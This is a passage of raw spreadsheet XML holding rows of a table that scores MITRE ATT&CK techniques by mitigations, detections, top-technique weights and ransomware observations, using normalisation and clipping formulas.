        <f>(Table1[[#This Row],[Total Detections]]-parameters!$D$4)/(parameters!$D$5-parameters!$D$4)</f>
        <v>0.02</v>
      </c>
      <c r="AB244">
        <f>IF(Table1[[#This Row],[Detections Utility (unclipped)]]&gt;1,1, IF(Table1[[#This Row],[Detections Utility (unclipped)]]&lt;0,0, Table1[[#This Row],[Detections Utility (unclipped)]]) )</f>
        <v>0.02</v>
      </c>
      <c r="AC244" s="29" t="s">
        <v>92</v>
      </c>
      <c r="AD244" s="25" t="str" cm="1">
        <f t="array" ref="AD244">IF(SUMPRODUCT(--(NOT(ISERR(SEARCH({"Process","Command","Script","WMI","Module","Pipe","Service"},AC244)))))&gt;0,"1","0")</f>
        <v>1</v>
      </c>
      <c r="AE244" s="25">
        <f>IF(AD244="1",'TOP 10 TECHNIQUES'!C$15,0)</f>
        <v>0.19800000000000001</v>
      </c>
      <c r="AF244" s="25" t="str" cm="1">
        <f t="array" ref="AF244">IF(SUMPRODUCT(--(NOT(ISERR(SEARCH({"Network","Firewall"},AC244)))))&gt;0,"1","0")</f>
        <v>0</v>
      </c>
      <c r="AG244" s="25">
        <f>IF(AF244="1",'TOP 10 TECHNIQUES'!C$16,0)</f>
        <v>0</v>
      </c>
      <c r="AH244" s="25" t="str" cm="1">
        <f t="array" ref="AH244">IF(SUMPRODUCT(--(NOT(ISERR(SEARCH({"File","Group","Logon","Schedule","User","Registry","Active","Application"},AC244)))))&gt;0,"1","0")</f>
        <v>0</v>
      </c>
      <c r="AI244" s="25">
        <f>IF(AH244="1",'TOP 10 TECHNIQUES'!C$17,0)</f>
        <v>0</v>
      </c>
      <c r="AJ244" s="25" t="str" cm="1">
        <f t="array" ref="AJ244">IF(SUMPRODUCT(--(NOT(ISERR(SEARCH({"Cloud","Cluster","Container","Image","Instance","Pod","Snapshot","Volume"},AC244)))))&gt;0,"1","0")</f>
        <v>0</v>
      </c>
      <c r="AK244" s="25">
        <f>IF(AJ244="1",'TOP 10 TECHNIQUES'!C$18,0)</f>
        <v>0</v>
      </c>
      <c r="AL244" s="25" t="str" cm="1">
        <f t="array" ref="AL244">IF(SUMPRODUCT(--(NOT(ISERR(SEARCH({"Drive","Firmware","Host","Kernel"},AC244)))))&gt;0,"1","0")</f>
        <v>0</v>
      </c>
      <c r="AM244" s="25">
        <f>IF(AL244="1",'TOP 10 TECHNIQUES'!C$19,0)</f>
        <v>0</v>
      </c>
      <c r="AN244" s="59">
        <v>0</v>
      </c>
      <c r="AO244" s="51">
        <v>0</v>
      </c>
      <c r="AP244" s="25">
        <f>parameters!$J$21*Table1[[#This Row],[TAT Utility]]+parameters!$J$22*Table1[[#This Row],[Count Utility]]</f>
        <v>3.4799047619047618E-2</v>
      </c>
      <c r="AQ244" s="25">
        <f>(Table1[[#This Row],[Total Top Att&amp;ck Score ]]-parameters!$D$19)/(parameters!$D$20-parameters!$D$19)</f>
        <v>0.11599682539682539</v>
      </c>
      <c r="AR244" s="25">
        <f>IF(Table1[[#This Row],[TAT Utility (unclipped)]]&gt;1,1, IF(Table1[[#This Row],[TAT Utility (unclipped)]]&lt;0,0, Table1[[#This Row],[TAT Utility (unclipped)]]) )</f>
        <v>0.11599682539682539</v>
      </c>
      <c r="AS244" s="25">
        <f>(Table1[[#This Row],[Ransomware (Total '# of ATT&amp;CK Observations)]]-parameters!$D$21)/(parameters!$D$22-parameters!$D$21)</f>
        <v>0</v>
      </c>
      <c r="AT244" s="25">
        <f>IF(Table1[[#This Row],[Count Utility (unclipped)]]&gt;1,1, IF(Table1[[#This Row],[Count Utility (unclipped)]]&lt;0,0, Table1[[#This Row],[Count Utility (unclipped)]]) )</f>
        <v>0</v>
      </c>
      <c r="AU24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45" spans="1:47">
      <c r="A245" s="25">
        <f>parameters!$J$21*Table1[[#This Row],[TAT Utility]]+parameters!$J$22*Table1[[#This Row],[Count Utility]]</f>
        <v>3.2342857142857152E-2</v>
      </c>
      <c r="B245" s="25">
        <f>SUM(H245,M245,V245)*(1+SUM(AE245,AG245,AI245,AK245,AM245))</f>
        <v>0.32342857142857151</v>
      </c>
      <c r="C245" s="25" t="s">
        <v>1045</v>
      </c>
      <c r="D245" s="25" t="s">
        <v>1046</v>
      </c>
      <c r="E245" s="25" t="s">
        <v>1047</v>
      </c>
      <c r="F245" s="51">
        <v>1</v>
      </c>
      <c r="G245" s="51">
        <v>1</v>
      </c>
      <c r="H245" s="25">
        <f>parameters!$J$10*Table1[[#This Row],[Before Utility]]+parameters!$J$11*Table1[[#This Row],[After Utility]]</f>
        <v>0.1</v>
      </c>
      <c r="I245">
        <f>(Table1[[#This Row],[Num. TID Before]]-parameters!$D$8)/(parameters!$D$9-parameters!$D$8)</f>
        <v>0.1</v>
      </c>
      <c r="J245">
        <f>IF(Table1[[#This Row],[Before Utility (unclipped)]]&gt;1,1, IF(Table1[[#This Row],[Before Utility (unclipped)]]&lt;0,0, Table1[[#This Row],[Before Utility (unclipped)]]))</f>
        <v>0.1</v>
      </c>
      <c r="K245">
        <f>(Table1[[#This Row],[Num. TID After]]-parameters!$D$10)/(parameters!$D$11-parameters!$D$10)</f>
        <v>0.1</v>
      </c>
      <c r="L245">
        <f>IF(Table1[[#This Row],[After Utility (unclipped)]]&gt;1,1, IF(Table1[[#This Row],[After Utility (unclipped)]]&lt;0,0, Table1[[#This Row],[After Utility (unclipped)]]))</f>
        <v>0.1</v>
      </c>
      <c r="M245" s="25">
        <v>0</v>
      </c>
      <c r="N245" s="51">
        <v>0</v>
      </c>
      <c r="O245" s="51">
        <v>1</v>
      </c>
      <c r="P245" s="51">
        <v>0</v>
      </c>
      <c r="Q245" s="51">
        <v>0</v>
      </c>
      <c r="R245" s="52" t="s">
        <v>1048</v>
      </c>
      <c r="S245" s="51">
        <v>8</v>
      </c>
      <c r="T245" s="52" t="s">
        <v>1049</v>
      </c>
      <c r="U245" s="51">
        <v>11</v>
      </c>
      <c r="V245" s="25">
        <f>parameters!$J$4*Table1[[#This Row],[Mitigations Utility]] + parameters!$J$5*Table1[[#This Row],[Detections Utility]]</f>
        <v>0.18571428571428575</v>
      </c>
      <c r="W245">
        <f>SUM(Table1[[#This Row],[Num. 800-53 (r5)]],Table1[[#This Row],[Num. CIS Controls]])</f>
        <v>19</v>
      </c>
      <c r="X245">
        <f>(Table1[[#This Row],[Total Mitigations]]-parameters!$D$2)/(parameters!$D$3-parameters!$D$2)</f>
        <v>0.34545454545454546</v>
      </c>
      <c r="Y245">
        <f>IF(Table1[[#This Row],[Mitigations Utility (unclipped)]]&gt;1,1, IF(Table1[[#This Row],[Mitigations Utility (unclipped)]]&lt;0,0, Table1[[#This Row],[Mitigations Utility (unclipped)]]) )</f>
        <v>0.34545454545454546</v>
      </c>
      <c r="Z245">
        <f>SUM(Table1[[#This Row],[Num. CAR]:[Num. Splunk]])</f>
        <v>1</v>
      </c>
      <c r="AA245">
        <f>(Table1[[#This Row],[Total Detections]]-parameters!$D$4)/(parameters!$D$5-parameters!$D$4)</f>
        <v>0.01</v>
      </c>
      <c r="AB245">
        <f>IF(Table1[[#This Row],[Detections Utility (unclipped)]]&gt;1,1, IF(Table1[[#This Row],[Detections Utility (unclipped)]]&lt;0,0, Table1[[#This Row],[Detections Utility (unclipped)]]) )</f>
        <v>0.01</v>
      </c>
      <c r="AC245" s="29" t="s">
        <v>1050</v>
      </c>
      <c r="AD245" s="25" t="str" cm="1">
        <f t="array" ref="AD245">IF(SUMPRODUCT(--(NOT(ISERR(SEARCH({"Process","Command","Script","WMI","Module","Pipe","Service"},AC245)))))&gt;0,"1","0")</f>
        <v>0</v>
      </c>
      <c r="AE245" s="25">
        <f>IF(AD245="1",'TOP 10 TECHNIQUES'!C$15,0)</f>
        <v>0</v>
      </c>
      <c r="AF245" s="25" t="str" cm="1">
        <f t="array" ref="AF245">IF(SUMPRODUCT(--(NOT(ISERR(SEARCH({"Network","Firewall"},AC245)))))&gt;0,"1","0")</f>
        <v>0</v>
      </c>
      <c r="AG245" s="25">
        <f>IF(AF245="1",'TOP 10 TECHNIQUES'!C$16,0)</f>
        <v>0</v>
      </c>
      <c r="AH245" s="25" t="str" cm="1">
        <f t="array" ref="AH245">IF(SUMPRODUCT(--(NOT(ISERR(SEARCH({"File","Group","Logon","Schedule","User","Registry","Active","Application"},AC245)))))&gt;0,"1","0")</f>
        <v>1</v>
      </c>
      <c r="AI245" s="25">
        <f>IF(AH245="1",'TOP 10 TECHNIQUES'!C$17,0)</f>
        <v>0.13200000000000001</v>
      </c>
      <c r="AJ245" s="25" t="str" cm="1">
        <f t="array" ref="AJ245">IF(SUMPRODUCT(--(NOT(ISERR(SEARCH({"Cloud","Cluster","Container","Image","Instance","Pod","Snapshot","Volume"},AC245)))))&gt;0,"1","0")</f>
        <v>0</v>
      </c>
      <c r="AK245" s="25">
        <f>IF(AJ245="1",'TOP 10 TECHNIQUES'!C$18,0)</f>
        <v>0</v>
      </c>
      <c r="AL245" s="25" t="str" cm="1">
        <f t="array" ref="AL245">IF(SUMPRODUCT(--(NOT(ISERR(SEARCH({"Drive","Firmware","Host","Kernel"},AC245)))))&gt;0,"1","0")</f>
        <v>0</v>
      </c>
      <c r="AM245" s="25">
        <f>IF(AL245="1",'TOP 10 TECHNIQUES'!C$19,0)</f>
        <v>0</v>
      </c>
      <c r="AN245" s="60">
        <v>0</v>
      </c>
      <c r="AO245" s="51">
        <v>0</v>
      </c>
      <c r="AP245" s="25">
        <f>parameters!$J$21*Table1[[#This Row],[TAT Utility]]+parameters!$J$22*Table1[[#This Row],[Count Utility]]</f>
        <v>3.2342857142857152E-2</v>
      </c>
      <c r="AQ245" s="25">
        <f>(Table1[[#This Row],[Total Top Att&amp;ck Score ]]-parameters!$D$19)/(parameters!$D$20-parameters!$D$19)</f>
        <v>0.10780952380952384</v>
      </c>
      <c r="AR245" s="25">
        <f>IF(Table1[[#This Row],[TAT Utility (unclipped)]]&gt;1,1, IF(Table1[[#This Row],[TAT Utility (unclipped)]]&lt;0,0, Table1[[#This Row],[TAT Utility (unclipped)]]) )</f>
        <v>0.10780952380952384</v>
      </c>
      <c r="AS245" s="25">
        <f>(Table1[[#This Row],[Ransomware (Total '# of ATT&amp;CK Observations)]]-parameters!$D$21)/(parameters!$D$22-parameters!$D$21)</f>
        <v>0</v>
      </c>
      <c r="AT245" s="25">
        <f>IF(Table1[[#This Row],[Count Utility (unclipped)]]&gt;1,1, IF(Table1[[#This Row],[Count Utility (unclipped)]]&lt;0,0, Table1[[#This Row],[Count Utility (unclipped)]]) )</f>
        <v>0</v>
      </c>
      <c r="AU24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46" spans="1:47" ht="32.1">
      <c r="A246" s="25">
        <f>parameters!$J$21*Table1[[#This Row],[TAT Utility]]+parameters!$J$22*Table1[[#This Row],[Count Utility]]</f>
        <v>2.8571428571428574E-2</v>
      </c>
      <c r="B246" s="25">
        <f>SUM(H246,M246,V246)*(1+SUM(AE246,AG246,AI246,AK246,AM246))</f>
        <v>0.28571428571428575</v>
      </c>
      <c r="C246" s="25" t="s">
        <v>1051</v>
      </c>
      <c r="D246" s="25" t="s">
        <v>507</v>
      </c>
      <c r="E246" s="25" t="s">
        <v>1052</v>
      </c>
      <c r="F246" s="51">
        <v>1</v>
      </c>
      <c r="G246" s="51">
        <v>1</v>
      </c>
      <c r="H246" s="25">
        <f>parameters!$J$10*Table1[[#This Row],[Before Utility]]+parameters!$J$11*Table1[[#This Row],[After Utility]]</f>
        <v>0.1</v>
      </c>
      <c r="I246">
        <f>(Table1[[#This Row],[Num. TID Before]]-parameters!$D$8)/(parameters!$D$9-parameters!$D$8)</f>
        <v>0.1</v>
      </c>
      <c r="J246">
        <f>IF(Table1[[#This Row],[Before Utility (unclipped)]]&gt;1,1, IF(Table1[[#This Row],[Before Utility (unclipped)]]&lt;0,0, Table1[[#This Row],[Before Utility (unclipped)]]))</f>
        <v>0.1</v>
      </c>
      <c r="K246">
        <f>(Table1[[#This Row],[Num. TID After]]-parameters!$D$10)/(parameters!$D$11-parameters!$D$10)</f>
        <v>0.1</v>
      </c>
      <c r="L246">
        <f>IF(Table1[[#This Row],[After Utility (unclipped)]]&gt;1,1, IF(Table1[[#This Row],[After Utility (unclipped)]]&lt;0,0, Table1[[#This Row],[After Utility (unclipped)]]))</f>
        <v>0.1</v>
      </c>
      <c r="M246" s="25">
        <v>0</v>
      </c>
      <c r="N246" s="51">
        <v>0</v>
      </c>
      <c r="O246" s="51">
        <v>0</v>
      </c>
      <c r="P246" s="51">
        <v>0</v>
      </c>
      <c r="Q246" s="51">
        <v>1</v>
      </c>
      <c r="R246" s="53" t="s">
        <v>1053</v>
      </c>
      <c r="S246" s="51">
        <v>3</v>
      </c>
      <c r="T246" s="51" t="s">
        <v>1054</v>
      </c>
      <c r="U246" s="51">
        <v>16</v>
      </c>
      <c r="V246" s="25">
        <f>parameters!$J$4*Table1[[#This Row],[Mitigations Utility]] + parameters!$J$5*Table1[[#This Row],[Detections Utility]]</f>
        <v>0.18571428571428575</v>
      </c>
      <c r="W246">
        <f>SUM(Table1[[#This Row],[Num. 800-53 (r5)]],Table1[[#This Row],[Num. CIS Controls]])</f>
        <v>19</v>
      </c>
      <c r="X246">
        <f>(Table1[[#This Row],[Total Mitigations]]-parameters!$D$2)/(parameters!$D$3-parameters!$D$2)</f>
        <v>0.34545454545454546</v>
      </c>
      <c r="Y246">
        <f>IF(Table1[[#This Row],[Mitigations Utility (unclipped)]]&gt;1,1, IF(Table1[[#This Row],[Mitigations Utility (unclipped)]]&lt;0,0, Table1[[#This Row],[Mitigations Utility (unclipped)]]) )</f>
        <v>0.34545454545454546</v>
      </c>
      <c r="Z246">
        <f>SUM(Table1[[#This Row],[Num. CAR]:[Num. Splunk]])</f>
        <v>1</v>
      </c>
      <c r="AA246">
        <f>(Table1[[#This Row],[Total Detections]]-parameters!$D$4)/(parameters!$D$5-parameters!$D$4)</f>
        <v>0.01</v>
      </c>
      <c r="AB246">
        <f>IF(Table1[[#This Row],[Detections Utility (unclipped)]]&gt;1,1, IF(Table1[[#This Row],[Detections Utility (unclipped)]]&lt;0,0, Table1[[#This Row],[Detections Utility (unclipped)]]) )</f>
        <v>0.01</v>
      </c>
      <c r="AC246" s="29" t="s">
        <v>467</v>
      </c>
      <c r="AD246" s="25" t="str" cm="1">
        <f t="array" ref="AD246">IF(SUMPRODUCT(--(NOT(ISERR(SEARCH({"Process","Command","Script","WMI","Module","Pipe","Service"},AC246)))))&gt;0,"1","0")</f>
        <v>0</v>
      </c>
      <c r="AE246" s="25">
        <f>IF(AD246="1",'TOP 10 TECHNIQUES'!C$15,0)</f>
        <v>0</v>
      </c>
      <c r="AF246" s="25" t="str" cm="1">
        <f t="array" ref="AF246">IF(SUMPRODUCT(--(NOT(ISERR(SEARCH({"Network","Firewall"},AC246)))))&gt;0,"1","0")</f>
        <v>1</v>
      </c>
      <c r="AG246" s="25">
        <f>IF(AF246="1",'TOP 10 TECHNIQUES'!C$16,0)</f>
        <v>0</v>
      </c>
      <c r="AH246" s="25" t="str" cm="1">
        <f t="array" ref="AH246">IF(SUMPRODUCT(--(NOT(ISERR(SEARCH({"File","Group","Logon","Schedule","User","Registry","Active","Application"},AC246)))))&gt;0,"1","0")</f>
        <v>0</v>
      </c>
      <c r="AI246" s="25">
        <f>IF(AH246="1",'TOP 10 TECHNIQUES'!C$17,0)</f>
        <v>0</v>
      </c>
      <c r="AJ246" s="25" t="str" cm="1">
        <f t="array" ref="AJ246">IF(SUMPRODUCT(--(NOT(ISERR(SEARCH({"Cloud","Cluster","Container","Image","Instance","Pod","Snapshot","Volume"},AC246)))))&gt;0,"1","0")</f>
        <v>0</v>
      </c>
      <c r="AK246" s="25">
        <f>IF(AJ246="1",'TOP 10 TECHNIQUES'!C$18,0)</f>
        <v>0</v>
      </c>
      <c r="AL246" s="25" t="str" cm="1">
        <f t="array" ref="AL246">IF(SUMPRODUCT(--(NOT(ISERR(SEARCH({"Drive","Firmware","Host","Kernel"},AC246)))))&gt;0,"1","0")</f>
        <v>0</v>
      </c>
      <c r="AM246" s="25">
        <f>IF(AL246="1",'TOP 10 TECHNIQUES'!C$19,0)</f>
        <v>0</v>
      </c>
      <c r="AN246" s="59">
        <v>0</v>
      </c>
      <c r="AO246" s="51">
        <v>0</v>
      </c>
      <c r="AP246" s="25">
        <f>parameters!$J$21*Table1[[#This Row],[TAT Utility]]+parameters!$J$22*Table1[[#This Row],[Count Utility]]</f>
        <v>2.8571428571428574E-2</v>
      </c>
      <c r="AQ246" s="25">
        <f>(Table1[[#This Row],[Total Top Att&amp;ck Score ]]-parameters!$D$19)/(parameters!$D$20-parameters!$D$19)</f>
        <v>9.5238095238095247E-2</v>
      </c>
      <c r="AR246" s="25">
        <f>IF(Table1[[#This Row],[TAT Utility (unclipped)]]&gt;1,1, IF(Table1[[#This Row],[TAT Utility (unclipped)]]&lt;0,0, Table1[[#This Row],[TAT Utility (unclipped)]]) )</f>
        <v>9.5238095238095247E-2</v>
      </c>
      <c r="AS246" s="25">
        <f>(Table1[[#This Row],[Ransomware (Total '# of ATT&amp;CK Observations)]]-parameters!$D$21)/(parameters!$D$22-parameters!$D$21)</f>
        <v>0</v>
      </c>
      <c r="AT246" s="25">
        <f>IF(Table1[[#This Row],[Count Utility (unclipped)]]&gt;1,1, IF(Table1[[#This Row],[Count Utility (unclipped)]]&lt;0,0, Table1[[#This Row],[Count Utility (unclipped)]]) )</f>
        <v>0</v>
      </c>
      <c r="AU24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47" spans="1:47">
      <c r="A247" s="25">
        <f>parameters!$J$21*Table1[[#This Row],[TAT Utility]]+parameters!$J$22*Table1[[#This Row],[Count Utility]]</f>
        <v>2.8571428571428574E-2</v>
      </c>
      <c r="B247" s="25">
        <f>SUM(H247,M247,V247)*(1+SUM(AE247,AG247,AI247,AK247,AM247))</f>
        <v>0.28571428571428575</v>
      </c>
      <c r="C247" s="25" t="s">
        <v>1055</v>
      </c>
      <c r="D247" s="25" t="s">
        <v>1046</v>
      </c>
      <c r="E247" s="25" t="s">
        <v>89</v>
      </c>
      <c r="F247" s="51">
        <v>1</v>
      </c>
      <c r="G247" s="51">
        <v>1</v>
      </c>
      <c r="H247" s="25">
        <f>parameters!$J$10*Table1[[#This Row],[Before Utility]]+parameters!$J$11*Table1[[#This Row],[After Utility]]</f>
        <v>0.1</v>
      </c>
      <c r="I247">
        <f>(Table1[[#This Row],[Num. TID Before]]-parameters!$D$8)/(parameters!$D$9-parameters!$D$8)</f>
        <v>0.1</v>
      </c>
      <c r="J247">
        <f>IF(Table1[[#This Row],[Before Utility (unclipped)]]&gt;1,1, IF(Table1[[#This Row],[Before Utility (unclipped)]]&lt;0,0, Table1[[#This Row],[Before Utility (unclipped)]]))</f>
        <v>0.1</v>
      </c>
      <c r="K247">
        <f>(Table1[[#This Row],[Num. TID After]]-parameters!$D$10)/(parameters!$D$11-parameters!$D$10)</f>
        <v>0.1</v>
      </c>
      <c r="L247">
        <f>IF(Table1[[#This Row],[After Utility (unclipped)]]&gt;1,1, IF(Table1[[#This Row],[After Utility (unclipped)]]&lt;0,0, Table1[[#This Row],[After Utility (unclipped)]]))</f>
        <v>0.1</v>
      </c>
      <c r="M247" s="25">
        <v>0</v>
      </c>
      <c r="N247" s="51">
        <v>0</v>
      </c>
      <c r="O247" s="51">
        <v>1</v>
      </c>
      <c r="P247" s="51">
        <v>0</v>
      </c>
      <c r="Q247" s="51">
        <v>0</v>
      </c>
      <c r="R247" s="52" t="s">
        <v>1048</v>
      </c>
      <c r="S247" s="51">
        <v>8</v>
      </c>
      <c r="T247" s="52" t="s">
        <v>1049</v>
      </c>
      <c r="U247" s="51">
        <v>11</v>
      </c>
      <c r="V247" s="25">
        <f>parameters!$J$4*Table1[[#This Row],[Mitigations Utility]] + parameters!$J$5*Table1[[#This Row],[Detections Utility]]</f>
        <v>0.18571428571428575</v>
      </c>
      <c r="W247">
        <f>SUM(Table1[[#This Row],[Num. 800-53 (r5)]],Table1[[#This Row],[Num. CIS Controls]])</f>
        <v>19</v>
      </c>
      <c r="X247">
        <f>(Table1[[#This Row],[Total Mitigations]]-parameters!$D$2)/(parameters!$D$3-parameters!$D$2)</f>
        <v>0.34545454545454546</v>
      </c>
      <c r="Y247">
        <f>IF(Table1[[#This Row],[Mitigations Utility (unclipped)]]&gt;1,1, IF(Table1[[#This Row],[Mitigations Utility (unclipped)]]&lt;0,0, Table1[[#This Row],[Mitigations Utility (unclipped)]]) )</f>
        <v>0.34545454545454546</v>
      </c>
      <c r="Z247">
        <f>SUM(Table1[[#This Row],[Num. CAR]:[Num. Splunk]])</f>
        <v>1</v>
      </c>
      <c r="AA247">
        <f>(Table1[[#This Row],[Total Detections]]-parameters!$D$4)/(parameters!$D$5-parameters!$D$4)</f>
        <v>0.01</v>
      </c>
      <c r="AB247">
        <f>IF(Table1[[#This Row],[Detections Utility (unclipped)]]&gt;1,1, IF(Table1[[#This Row],[Detections Utility (unclipped)]]&lt;0,0, Table1[[#This Row],[Detections Utility (unclipped)]]) )</f>
        <v>0.01</v>
      </c>
      <c r="AC247" s="29" t="s">
        <v>665</v>
      </c>
      <c r="AD247" s="25" t="str" cm="1">
        <f t="array" ref="AD247">IF(SUMPRODUCT(--(NOT(ISERR(SEARCH({"Process","Command","Script","WMI","Module","Pipe","Service"},AC247)))))&gt;0,"1","0")</f>
        <v>0</v>
      </c>
      <c r="AE247" s="25">
        <f>IF(AD247="1",'TOP 10 TECHNIQUES'!C$15,0)</f>
        <v>0</v>
      </c>
      <c r="AF247" s="25" t="str" cm="1">
        <f t="array" ref="AF247">IF(SUMPRODUCT(--(NOT(ISERR(SEARCH({"Network","Firewall"},AC247)))))&gt;0,"1","0")</f>
        <v>0</v>
      </c>
      <c r="AG247" s="25">
        <f>IF(AF247="1",'TOP 10 TECHNIQUES'!C$16,0)</f>
        <v>0</v>
      </c>
      <c r="AH247" s="25" t="str" cm="1">
        <f t="array" ref="AH247">IF(SUMPRODUCT(--(NOT(ISERR(SEARCH({"File","Group","Logon","Schedule","User","Registry","Active","Application"},AC247)))))&gt;0,"1","0")</f>
        <v>0</v>
      </c>
      <c r="AI247" s="25">
        <f>IF(AH247="1",'TOP 10 TECHNIQUES'!C$17,0)</f>
        <v>0</v>
      </c>
      <c r="AJ247" s="25" t="str" cm="1">
        <f t="array" ref="AJ247">IF(SUMPRODUCT(--(NOT(ISERR(SEARCH({"Cloud","Cluster","Container","Image","Instance","Pod","Snapshot","Volume"},AC247)))))&gt;0,"1","0")</f>
        <v>0</v>
      </c>
      <c r="AK247" s="25">
        <f>IF(AJ247="1",'TOP 10 TECHNIQUES'!C$18,0)</f>
        <v>0</v>
      </c>
      <c r="AL247" s="25" t="str" cm="1">
        <f t="array" ref="AL247">IF(SUMPRODUCT(--(NOT(ISERR(SEARCH({"Drive","Firmware","Host","Kernel"},AC247)))))&gt;0,"1","0")</f>
        <v>0</v>
      </c>
      <c r="AM247" s="25">
        <f>IF(AL247="1",'TOP 10 TECHNIQUES'!C$19,0)</f>
        <v>0</v>
      </c>
      <c r="AN247" s="52">
        <v>0</v>
      </c>
      <c r="AO247" s="51">
        <v>0</v>
      </c>
      <c r="AP247" s="25">
        <f>parameters!$J$21*Table1[[#This Row],[TAT Utility]]+parameters!$J$22*Table1[[#This Row],[Count Utility]]</f>
        <v>2.8571428571428574E-2</v>
      </c>
      <c r="AQ247" s="25">
        <f>(Table1[[#This Row],[Total Top Att&amp;ck Score ]]-parameters!$D$19)/(parameters!$D$20-parameters!$D$19)</f>
        <v>9.5238095238095247E-2</v>
      </c>
      <c r="AR247" s="25">
        <f>IF(Table1[[#This Row],[TAT Utility (unclipped)]]&gt;1,1, IF(Table1[[#This Row],[TAT Utility (unclipped)]]&lt;0,0, Table1[[#This Row],[TAT Utility (unclipped)]]) )</f>
        <v>9.5238095238095247E-2</v>
      </c>
      <c r="AS247" s="25">
        <f>(Table1[[#This Row],[Ransomware (Total '# of ATT&amp;CK Observations)]]-parameters!$D$21)/(parameters!$D$22-parameters!$D$21)</f>
        <v>0</v>
      </c>
      <c r="AT247" s="25">
        <f>IF(Table1[[#This Row],[Count Utility (unclipped)]]&gt;1,1, IF(Table1[[#This Row],[Count Utility (unclipped)]]&lt;0,0, Table1[[#This Row],[Count Utility (unclipped)]]) )</f>
        <v>0</v>
      </c>
      <c r="AU24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48" spans="1:47" ht="32.1">
      <c r="A248" s="25">
        <f>parameters!$J$21*Table1[[#This Row],[TAT Utility]]+parameters!$J$22*Table1[[#This Row],[Count Utility]]</f>
        <v>7.1333333333333332E-2</v>
      </c>
      <c r="B248" s="25">
        <f>SUM(H248,M248,V248)*(1+SUM(AE248,AG248,AI248,AK248,AM248))</f>
        <v>0.38</v>
      </c>
      <c r="C248" s="25" t="s">
        <v>1056</v>
      </c>
      <c r="D248" s="25" t="s">
        <v>208</v>
      </c>
      <c r="E248" s="25" t="s">
        <v>1057</v>
      </c>
      <c r="F248" s="51">
        <v>1</v>
      </c>
      <c r="G248" s="51">
        <v>1</v>
      </c>
      <c r="H248" s="25">
        <f>parameters!$J$10*Table1[[#This Row],[Before Utility]]+parameters!$J$11*Table1[[#This Row],[After Utility]]</f>
        <v>0.1</v>
      </c>
      <c r="I248">
        <f>(Table1[[#This Row],[Num. TID Before]]-parameters!$D$8)/(parameters!$D$9-parameters!$D$8)</f>
        <v>0.1</v>
      </c>
      <c r="J248">
        <f>IF(Table1[[#This Row],[Before Utility (unclipped)]]&gt;1,1, IF(Table1[[#This Row],[Before Utility (unclipped)]]&lt;0,0, Table1[[#This Row],[Before Utility (unclipped)]]))</f>
        <v>0.1</v>
      </c>
      <c r="K248">
        <f>(Table1[[#This Row],[Num. TID After]]-parameters!$D$10)/(parameters!$D$11-parameters!$D$10)</f>
        <v>0.1</v>
      </c>
      <c r="L248">
        <f>IF(Table1[[#This Row],[After Utility (unclipped)]]&gt;1,1, IF(Table1[[#This Row],[After Utility (unclipped)]]&lt;0,0, Table1[[#This Row],[After Utility (unclipped)]]))</f>
        <v>0.1</v>
      </c>
      <c r="M248" s="25">
        <v>0</v>
      </c>
      <c r="N248" s="51">
        <v>3</v>
      </c>
      <c r="O248" s="51">
        <v>4</v>
      </c>
      <c r="P248" s="51">
        <v>1</v>
      </c>
      <c r="Q248" s="51">
        <v>1</v>
      </c>
      <c r="R248" s="51" t="s">
        <v>1058</v>
      </c>
      <c r="S248" s="51">
        <v>9</v>
      </c>
      <c r="T248" s="52" t="s">
        <v>1059</v>
      </c>
      <c r="U248" s="51">
        <v>6</v>
      </c>
      <c r="V248" s="25">
        <f>parameters!$J$4*Table1[[#This Row],[Mitigations Utility]] + parameters!$J$5*Table1[[#This Row],[Detections Utility]]</f>
        <v>0.18571428571428569</v>
      </c>
      <c r="W248">
        <f>SUM(Table1[[#This Row],[Num. 800-53 (r5)]],Table1[[#This Row],[Num. CIS Controls]])</f>
        <v>15</v>
      </c>
      <c r="X248">
        <f>(Table1[[#This Row],[Total Mitigations]]-parameters!$D$2)/(parameters!$D$3-parameters!$D$2)</f>
        <v>0.27272727272727271</v>
      </c>
      <c r="Y248">
        <f>IF(Table1[[#This Row],[Mitigations Utility (unclipped)]]&gt;1,1, IF(Table1[[#This Row],[Mitigations Utility (unclipped)]]&lt;0,0, Table1[[#This Row],[Mitigations Utility (unclipped)]]) )</f>
        <v>0.27272727272727271</v>
      </c>
      <c r="Z248">
        <f>SUM(Table1[[#This Row],[Num. CAR]:[Num. Splunk]])</f>
        <v>9</v>
      </c>
      <c r="AA248">
        <f>(Table1[[#This Row],[Total Detections]]-parameters!$D$4)/(parameters!$D$5-parameters!$D$4)</f>
        <v>0.09</v>
      </c>
      <c r="AB248">
        <f>IF(Table1[[#This Row],[Detections Utility (unclipped)]]&gt;1,1, IF(Table1[[#This Row],[Detections Utility (unclipped)]]&lt;0,0, Table1[[#This Row],[Detections Utility (unclipped)]]) )</f>
        <v>0.09</v>
      </c>
      <c r="AC248" s="29" t="s">
        <v>1060</v>
      </c>
      <c r="AD248" s="25" t="str" cm="1">
        <f t="array" ref="AD248">IF(SUMPRODUCT(--(NOT(ISERR(SEARCH({"Process","Command","Script","WMI","Module","Pipe","Service"},AC248)))))&gt;0,"1","0")</f>
        <v>1</v>
      </c>
      <c r="AE248" s="25">
        <f>IF(AD248="1",'TOP 10 TECHNIQUES'!C$15,0)</f>
        <v>0.19800000000000001</v>
      </c>
      <c r="AF248" s="25" t="str" cm="1">
        <f t="array" ref="AF248">IF(SUMPRODUCT(--(NOT(ISERR(SEARCH({"Network","Firewall"},AC248)))))&gt;0,"1","0")</f>
        <v>0</v>
      </c>
      <c r="AG248" s="25">
        <f>IF(AF248="1",'TOP 10 TECHNIQUES'!C$16,0)</f>
        <v>0</v>
      </c>
      <c r="AH248" s="25" t="str" cm="1">
        <f t="array" ref="AH248">IF(SUMPRODUCT(--(NOT(ISERR(SEARCH({"File","Group","Logon","Schedule","User","Registry","Active","Application"},AC248)))))&gt;0,"1","0")</f>
        <v>1</v>
      </c>
      <c r="AI248" s="25">
        <f>IF(AH248="1",'TOP 10 TECHNIQUES'!C$17,0)</f>
        <v>0.13200000000000001</v>
      </c>
      <c r="AJ248" s="25" t="str" cm="1">
        <f t="array" ref="AJ248">IF(SUMPRODUCT(--(NOT(ISERR(SEARCH({"Cloud","Cluster","Container","Image","Instance","Pod","Snapshot","Volume"},AC248)))))&gt;0,"1","0")</f>
        <v>0</v>
      </c>
      <c r="AK248" s="25">
        <f>IF(AJ248="1",'TOP 10 TECHNIQUES'!C$18,0)</f>
        <v>0</v>
      </c>
      <c r="AL248" s="25" t="str" cm="1">
